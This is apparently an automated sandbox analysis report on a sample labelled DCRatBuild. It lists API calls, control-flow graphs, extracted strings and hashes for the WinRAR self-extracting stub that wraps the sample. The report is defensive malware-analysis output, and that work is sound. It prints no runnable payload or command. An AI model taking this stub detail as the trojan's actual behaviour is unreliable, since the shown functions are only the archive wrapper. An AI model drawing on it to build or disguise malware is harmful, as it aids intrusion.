                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 004ABA90
                                                                                                                        • GetTickCount.KERNEL32 ref: 004ABAAE
                                                                                                                        • _swprintf.LIBCMT ref: 004ABAC2
                                                                                                                        • GetLastError.KERNEL32(?,00000011), ref: 004ABAF4
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 004ABB43
                                                                                                                        • _swprintf.LIBCMT ref: 004ABB7C
                                                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 004ABBD0
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 004ABBEA
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 004ABC47
                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 004ABC6F
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 004ABCB9
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 004ABCE2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004ABCEB
                                                                                                                        • _swprintf.LIBCMT ref: 004ABD1E
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004ABD7D
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,004C35F4), ref: 004ABD94
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 004ABD9D
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004ABDAC
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004ABDBB
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004ABE68
                                                                                                                        • _wcslen.LIBCMT ref: 004ABEBE
                                                                                                                        • _swprintf.LIBCMT ref: 004ABEE8
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004ABF32
                                                                                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 004ABF4C
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 004ABF55
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 004ABF6B
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 004ABF85
                                                                                                                        • SetWindowTextW.USER32(00000000,004DA472), ref: 004ABFA7
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 004AC007
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004AC01A
                                                                                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 004AC0BD
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004AC197
                                                                                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 004AC1D9
                                                                                                                          • Part of subcall function 004AC73F: __EH_prolog.LIBCMT ref: 004AC744
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004AC1FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<J$STARTDLG$^J$__tmp_rar_sfx_access_check_%u$hJ$winrarsfxmappingfile.tmp$QL
                                                                                                                        • API String ID: 3829768659-2687651133
                                                                                                                        • Opcode ID: 669df2afd533cf8ff9fb3f9e34a71373b6ae00c1162b62bc13344d082647c0ab
                                                                                                                        • Instruction ID: c469496e93bde728ef1985a306cd70b458849851e4aa5b6abf001e837f0629e2
                                                                                                                        • Opcode Fuzzy Hash: 669df2afd533cf8ff9fb3f9e34a71373b6ae00c1162b62bc13344d082647c0ab
                                                                                                                        • Instruction Fuzzy Hash: CF42F571944244BEEB21AF619C8AFBF3B6CAB22704F14406BF540A61D2CB7D5E44CB6D
                                                                                                                        Function 004A0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 269 4a0863-4a0886 call 4aec50 GetModuleHandleW 272 4a0888-4a089f GetProcAddress 269->272 273 4a08e7-4a0b48 269->273 276 4a08b9-4a08c9 GetProcAddress 272->276 277 4a08a1-4a08b7 272->277 274 4a0b4e-4a0b59 call 4b75fb 273->274 275 4a0c14-4a0c40 GetModuleFileNameW call 49c29a call 4a0602 273->275 274->275 286 4a0b5f-4a0b8d GetModuleFileNameW CreateFileW 274->286 291 4a0c42-4a0c4e call 49b146 275->291 280 4a08cb-4a08e0 276->280 281 4a08e5 276->281 277->276 280->281 281->273 289 4a0c08-4a0c0f CloseHandle 286->289 290 4a0b8f-4a0b9b SetFilePointer 286->290 289->275 290->289 292 4a0b9d-4a0bb9 ReadFile 290->292 298 4a0c7d-4a0ca4 call 49c310 GetFileAttributesW 291->298 299 4a0c50-4a0c5b call 4a081b 291->299 292->289 295 4a0bbb-4a0be0 292->295 297 4a0bfd-4a0c06 call 4a0371 295->297 297->289 306 4a0be2-4a0bfc call 4a081b 297->306 309 4a0cae 298->309 310 4a0ca6-4a0caa 298->310 299->298 308 4a0c5d-4a0c7b CompareStringW 299->308 306->297 308->298 308->310 311 4a0cb0-4a0cb5 309->311 310->291 313 4a0cac 310->313 314 4a0cec-4a0cee 311->314 315 4a0cb7 311->315 313->311 317 4a0dfb-4a0e05 314->317 318 4a0cf4-4a0d0b call 49c2e4 call 49b146 314->318 316 4a0cb9-4a0ce0 call 49c310 GetFileAttributesW 315->316 323 4a0cea 316->323 324 4a0ce2-4a0ce6 316->324 328 4a0d0d-4a0d6e call 4a081b * 2 call 49e617 call 494092 call 49e617 call 4aa7e4 318->328 329 4a0d73-4a0da6 call 494092 AllocConsole 318->329 323->314 324->316 326 4a0ce8 324->326 326->314 336 4a0df3-4a0df5 ExitProcess 328->336 335 4a0da8-4a0ded GetCurrentProcessId AttachConsole call 4b3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 329->335 329->336 335->336
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 004A087C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004A088E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004A08BF
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004A0B69
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A0B83
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004A0B93
                                                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<L,00000000), ref: 004A0BB1
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004A0C09
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004A0C1E
                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<L,?,00000000,?,00000800), ref: 004A0C72
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,|<L,00000800,?,00000000,?,00000800), ref: 004A0C9C
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,D=L,00000800), ref: 004A0CD8
                                                                                                                          • Part of subcall function 004A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
                                                                                                                          • Part of subcall function 004A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
                                                                                                                        • _swprintf.LIBCMT ref: 004A0D4A
                                                                                                                        • _swprintf.LIBCMT ref: 004A0D96
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • AllocConsole.KERNEL32 ref: 004A0D9E
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004A0DA8
                                                                                                                        • AttachConsole.KERNEL32(00000000), ref: 004A0DAF
                                                                                                                        • _wcslen.LIBCMT ref: 004A0DC4
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004A0DD5
                                                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 004A0DDC
                                                                                                                        • Sleep.KERNEL32(00002710), ref: 004A0DE7
                                                                                                                        • FreeConsole.KERNEL32 ref: 004A0DED
                                                                                                                        • ExitProcess.KERNEL32 ref: 004A0DF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                        • String ID: (=L$,<L$,@L$0?L$0AL$4BL$8>L$D=L$DXGIDebug.dll$H?L$H@L$HAL$P>L$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=L$`@L$d?L$dAL$dwmapi.dll$h=L$h>L$kernel32$uxtheme.dll$|<L$|?L$|@L$<L$>L$?L$@L$AL
                                                                                                                        • API String ID: 1207345701-3345128522
                                                                                                                        • Opcode ID: 7278e89132d0fe35c80dc9fa115fa70691f2838945cc1edb93751fca4b31dccb
                                                                                                                        • Instruction ID: b4deb22b057566e1f9b3518e4adcd1cffcb7f9659c1c319daf7828fbfb34edda
                                                                                                                        • Opcode Fuzzy Hash: 7278e89132d0fe35c80dc9fa115fa70691f2838945cc1edb93751fca4b31dccb
                                                                                                                        • Instruction Fuzzy Hash: E5D174B5008344ABD7B09F51C949FDFBAE8BB95709F50C91FF18596240CB788648CB6E
                                                                                                                        Function 004AC73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 348 4ac73f-4ac757 call 4aeb78 call 4aec50 353 4ad40d-4ad418 348->353 354 4ac75d-4ac787 call 4ab314 348->354 354->353 357 4ac78d-4ac792 354->357 358 4ac793-4ac7a1 357->358 359 4ac7a2-4ac7b7 call 4aaf98 358->359 362 4ac7b9 359->362 363 4ac7bb-4ac7d0 call 4a1fbb 362->363 366 4ac7dd-4ac7e0 363->366 367 4ac7d2-4ac7d6 363->367 369 4ad3d9-4ad404 call 4ab314 366->369 370 4ac7e6 366->370 367->363 368 4ac7d8 367->368 368->369 369->358 384 4ad40a-4ad40c 369->384 372 4ac9be-4ac9c0 370->372 373 4aca5f-4aca61 370->373 374 4aca7c-4aca7e 370->374 375 4ac7ed-4ac7f0 370->375 372->369 380 4ac9c6-4ac9d2 372->380 373->369 377 4aca67-4aca77 SetWindowTextW 373->377 374->369 379 4aca84-4aca8b 374->379 375->369 376 4ac7f6-4ac850 call 4aa64d call 49bdf3 call 49a544 call 49a67e call 496edb 375->376 437 4ac98f-4ac9a4 call 49a5d1 376->437 377->369 379->369 385 4aca91-4acaaa 379->385 381 4ac9e6-4ac9eb 380->381 382 4ac9d4-4ac9e5 call 4b7686 380->382 388 4ac9ed-4ac9f3 381->388 389 4ac9f5-4aca00 call 4ab48e 381->389 382->381 384->353 390 4acaac 385->390 391 4acab2-4acac0 call 4b3e13 385->391 395 4aca05-4aca07 388->395 389->395 390->391 391->369 402 4acac6-4acacf 391->402 400 4aca09-4aca10 call 4b3e13 395->400 401 4aca12-4aca32 call 4b3e13 call 4b3e3e 395->401 400->401 422 4aca4b-4aca4d 401->422 423 4aca34-4aca3b 401->423 406 4acaf8-4acafb 402->406 407 4acad1-4acad5 402->407 411 4acb01-4acb04 406->411 414 4acbe0-4acbee call 4a0602 406->414 407->411 412 4acad7-4acadf 407->412 420 4acb11-4acb2c 411->420 421 4acb06-4acb0b 411->421 412->369 418 4acae5-4acaf3 call 4a0602 412->418 430 4acbf0-4acc04 call 4b279b 414->430 418->430 438 4acb2e-4acb68 420->438 439 4acb76-4acb7d 420->439 421->414 421->420 422->369 429 4aca53-4aca5a call 4b3e2e 422->429 427 4aca3d-4aca3f 423->427 428 4aca42-4aca4a call 4b7686 423->428 427->428 428->422 429->369 448 4acc11-4acc62 call 4a0602 call 4ab1be GetDlgItem SetWindowTextW SendMessageW call 4b3e49 430->448 449 4acc06-4acc0a 430->449 454 4ac9aa-4ac9b9 call 49a55a 437->454 455 4ac855-4ac869 SetFileAttributesW 437->455 467 4acb6a 438->467 468 4acb6c-4acb6e 438->468 441 4acbab-4acbce call 4b3e13 * 2 439->441 442 4acb7f-4acb97 call 4b3e13 439->442 441->430 475 4acbd0-4acbde call 4a05da 441->475 442->441 459 4acb99-4acba6 call 4a05da 442->459 482 4acc67-4acc6b 448->482 449->448 453 4acc0c-4acc0e 449->453 453->448 454->369 461 4ac90f-4ac91f GetFileAttributesW 455->461 462 4ac86f-4ac8a2 call 49b991 call 49b690 call 4b3e13 455->462 459->441 461->437 465 4ac921-4ac930 DeleteFileW 461->465 491 4ac8a4-4ac8b3 call 4b3e13 462->491 492 4ac8b5-4ac8c3 call 49bdb4 462->492 465->437 474 4ac932-4ac935 465->474 467->468 468->439 478 4ac939-4ac965 call 494092 GetFileAttributesW 474->478 475->430 489 4ac937-4ac938 478->489 490 4ac967-4ac97d MoveFileW 478->490 482->369 486 4acc71-4acc85 SendMessageW 482->486 486->369 489->478 490->437 493 4ac97f-4ac989 MoveFileExW 490->493 491->492 498 4ac8c9-4ac908 call 4b3e13 call 4afff0 491->498 492->454 492->498 493->437 498->461
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004AC744
                                                                                                                          • Part of subcall function 004AB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004AB3FB
                                                                                                                          • Part of subcall function 004AAF98: _wcschr.LIBVCRUNTIME ref: 004AB033
                                                                                                                        • _wcslen.LIBCMT ref: 004ACA0A
                                                                                                                        • _wcslen.LIBCMT ref: 004ACA13
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004ACA71
                                                                                                                        • _wcslen.LIBCMT ref: 004ACAB3
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 004ACBFB
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 004ACC36
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004ACC46
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,004DA472), ref: 004ACC54
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004ACC7F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                        • String ID: %s.%d.tmp$<br>$<J$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$J
                                                                                                                        • API String ID: 986293930-1283477974
                                                                                                                        • Opcode ID: 65238eedfd0192561582b5374b298c59588fc2d33f02b562922f3887847ba03f
                                                                                                                        • Instruction ID: 9a89d4cca27bea56c37f4ee61a2779d48046e7957f1886f3242f345778553a2d
                                                                                                                        • Opcode Fuzzy Hash: 65238eedfd0192561582b5374b298c59588fc2d33f02b562922f3887847ba03f
                                                                                                                        • Instruction Fuzzy Hash: B5E185B2900118AADF24DBA1DD85EEF73BCAB15314F1044ABF946E7140EF789E448F68
                                                                                                                        Function 0049DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0049DA70
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0049DA91
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0049DAAC
                                                                                                                          • Part of subcall function 0049C29A: _wcslen.LIBCMT ref: 0049C2A2
                                                                                                                          • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
                                                                                                                          • Part of subcall function 004A1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0049BAE9,00000000,?,?,?,00010422), ref: 004A1BA0
                                                                                                                        • _wcslen.LIBCMT ref: 0049DDE9
                                                                                                                        • __fprintf_l.LIBCMT ref: 0049DF1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9L
                                                                                                                        • API String ID: 557298264-3287507373
                                                                                                                        • Opcode ID: 215c38bf6120503d02b4312ae0064db21e199d0f6ee20312ec43b36232bab29e
                                                                                                                        • Instruction ID: 923b9fdff022c1f214716a8cdb09f01a5fd498bc4523b6b7516ab14212876df5
                                                                                                                        • Opcode Fuzzy Hash: 215c38bf6120503d02b4312ae0064db21e199d0f6ee20312ec43b36232bab29e
                                                                                                                        • Instruction Fuzzy Hash: A332D071900218EACF24EF69C842BEA7BA4FF15304F40416FF90597291EBB99D85CB58
                                                                                                                        Function 004AD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
                                                                                                                          • Part of subcall function 004AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
                                                                                                                          • Part of subcall function 004AB568: IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
                                                                                                                          • Part of subcall function 004AB568: TranslateMessage.USER32(?), ref: 004AB5AC
                                                                                                                          • Part of subcall function 004AB568: DispatchMessageW.USER32(?), ref: 004AB5B6
                                                                                                                        • GetDlgItem.USER32(00000068,004EFCB8), ref: 004AD4E8
                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,004AAF07,00000001,?,?,004AB7B9,004C506C,004EFCB8,004EFCB8,00001000,00000000,00000000), ref: 004AD510
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004AD51B
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,004C35F4), ref: 004AD529
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD53F
                                                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004AD559
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD59D
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004AD5AB
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD5BA
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD5E1
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,004C43F4), ref: 004AD5F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                        • String ID: \
                                                                                                                        • API String ID: 3569833718-2967466578
                                                                                                                        • Opcode ID: 2d4a7bf816796d574cfa028ca8fe40a52ff267dbec46f1795c47c09f855acb11
                                                                                                                        • Instruction ID: 202af352d673b31e2b61aa3e25ac58232c110c4c5475732d78d103c5b6b74fdb
                                                                                                                        • Opcode Fuzzy Hash: 2d4a7bf816796d574cfa028ca8fe40a52ff267dbec46f1795c47c09f855acb11
                                                                                                                        • Instruction Fuzzy Hash: 2031B071545342BFE301DF20AC4AFBB7FACEB96709F00452AF55196190EB648A14CB7E
                                                                                                                        Function 004AD78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 838 4ad78f-4ad7a7 call 4aec50 841 4ad9e8-4ad9f0 838->841 842 4ad7ad-4ad7b9 call 4b3e13 838->842 842->841 845 4ad7bf-4ad7e7 call 4afff0 842->845 848 4ad7e9 845->848 849 4ad7f1-4ad7ff 845->849 848->849 850 4ad812-4ad818 849->850 851 4ad801-4ad804 849->851 852 4ad85b-4ad85e 850->852 853 4ad808-4ad80e 851->853 852->853 856 4ad860-4ad866 852->856 854 4ad810 853->854 855 4ad837-4ad844 853->855 857 4ad822-4ad82c 854->857 858 4ad84a-4ad84e 855->858 859 4ad9c0-4ad9c2 855->859 860 4ad868-4ad86b 856->860 861 4ad86d-4ad86f 856->861 862 4ad81a-4ad820 857->862 863 4ad82e 857->863 864 4ad9c6 858->864 865 4ad854-4ad859 858->865 859->864 860->861 866 4ad882-4ad898 call 49b92d 860->866 861->866 867 4ad871-4ad878 861->867 862->857 869 4ad830-4ad833 862->869 863->855 872 4ad9cf 864->872 865->852 873 4ad89a-4ad8a7 call 4a1fbb 866->873 874 4ad8b1-4ad8bc call 49a231 866->874 867->866 870 4ad87a 867->870 869->855 870->866 875 4ad9d6-4ad9d8 872->875 873->874 883 4ad8a9 873->883 884 4ad8d9-4ad8dd 874->884 885 4ad8be-4ad8d5 call 49b6c4 874->885 878 4ad9da-4ad9dc 875->878 879 4ad9e7 875->879 878->879 882 4ad9de-4ad9e1 ShowWindow 878->882 879->841 882->879 883->874 888 4ad8e4-4ad8e6 884->888 885->884 888->879 889 4ad8ec-4ad8f9 888->889 890 4ad8fb-4ad902 889->890 891 4ad90c-4ad90e 889->891 890->891 892 4ad904-4ad90a 890->892 893 4ad910-4ad919 891->893 894 4ad925-4ad944 call 4adc3b 891->894 892->891 895 4ad97b-4ad987 CloseHandle 892->895 893->894 902 4ad91b-4ad923 ShowWindow 893->902 894->895 908 4ad946-4ad94e 894->908 896 4ad998-4ad9a6 895->896 897 4ad989-4ad996 call 4a1fbb 895->897 896->875 901 4ad9a8-4ad9aa 896->901 897->872 897->896 901->875 905 4ad9ac-4ad9b2 901->905 902->894 905->875 907 4ad9b4-4ad9be 905->907 907->875 908->895 909 4ad950-4ad961 GetExitCodeProcess 908->909 909->895 910 4ad963-4ad96d 909->910 911 4ad96f 910->911 912 4ad974 910->912 911->912 912->895
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 004AD7AE
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 004AD8DE
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004AD91D
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004AD959
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004AD97F
                                                                                                                        • ShowWindow.USER32(?,00000001), ref: 004AD9E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                        • String ID: .exe$.inf$PDu<J$hJ$rJ
                                                                                                                        • API String ID: 36480843-3000700308
                                                                                                                        • Opcode ID: 5f155dc98f3b5b54339d69a04cb956f4174203261f74a405299f60af2fd74b61
                                                                                                                        • Instruction ID: f378ea13d929cb979896cfec66f2dc8b08c8fbc831d31dce26bcfba07dcdbf4e
